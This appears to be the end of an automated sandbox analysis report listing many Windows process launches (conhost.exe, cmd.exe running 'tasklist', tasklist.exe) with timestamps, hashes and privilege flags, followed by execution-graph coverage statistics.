                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:84
                                                                                    Start time:17:54:49
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:85
                                                                                    Start time:17:54:49
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:86
                                                                                    Start time:17:54:49
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:87
                                                                                    Start time:17:54:49
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:88
                                                                                    Start time:17:54:51
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:89
                                                                                    Start time:17:54:51
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:90
                                                                                    Start time:17:54:51
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:91
                                                                                    Start time:17:54:51
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:92
                                                                                    Start time:17:54:51
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:93
                                                                                    Start time:17:54:51
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:94
                                                                                    Start time:17:54:52
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:95
                                                                                    Start time:17:54:52
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:100
                                                                                    Start time:17:54:53
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:110
                                                                                    Start time:17:54:54
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:120
                                                                                    Start time:17:54:54
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:130
                                                                                    Start time:17:54:56
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:135
                                                                                    Start time:17:54:56
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:140
                                                                                    Start time:17:54:56
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:150
                                                                                    Start time:17:54:58
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:155
                                                                                    Start time:17:54:58
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:160
                                                                                    Start time:17:54:58
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:180
                                                                                    Start time:17:55:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:190
                                                                                    Start time:17:55:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:200
                                                                                    Start time:17:55:01
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:230
                                                                                    Start time:17:55:04
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:235
                                                                                    Start time:17:55:05
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:255
                                                                                    Start time:17:55:07
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:265
                                                                                    Start time:17:55:08
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:275
                                                                                    Start time:17:55:08
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:290
                                                                                    Start time:17:55:09
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:330
                                                                                    Start time:17:55:13
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:385
                                                                                    Start time:17:55:18
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:395
                                                                                    Start time:17:55:19
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:415
                                                                                    Start time:17:55:20
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:420
                                                                                    Start time:17:55:21
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:424
                                                                                    Start time:17:55:21
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:430
                                                                                    Start time:17:55:22
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:465
                                                                                    Start time:17:55:24
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:469
                                                                                    Start time:17:55:24
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:496
                                                                                    Start time:17:55:26
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:506
                                                                                    Start time:17:55:27
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:511
                                                                                    Start time:17:55:27
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:531
                                                                                    Start time:17:55:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:546
                                                                                    Start time:17:55:31
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:566
                                                                                    Start time:17:55:32
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:571
                                                                                    Start time:17:55:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:605
                                                                                    Start time:17:55:36
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:621
                                                                                    Start time:17:55:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:636
                                                                                    Start time:17:55:39
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:656
                                                                                    Start time:17:55:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:26.9%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:21.1%
                                                                                      Total number of Nodes:1277
                                                                                      Total number of Limit Nodes:40
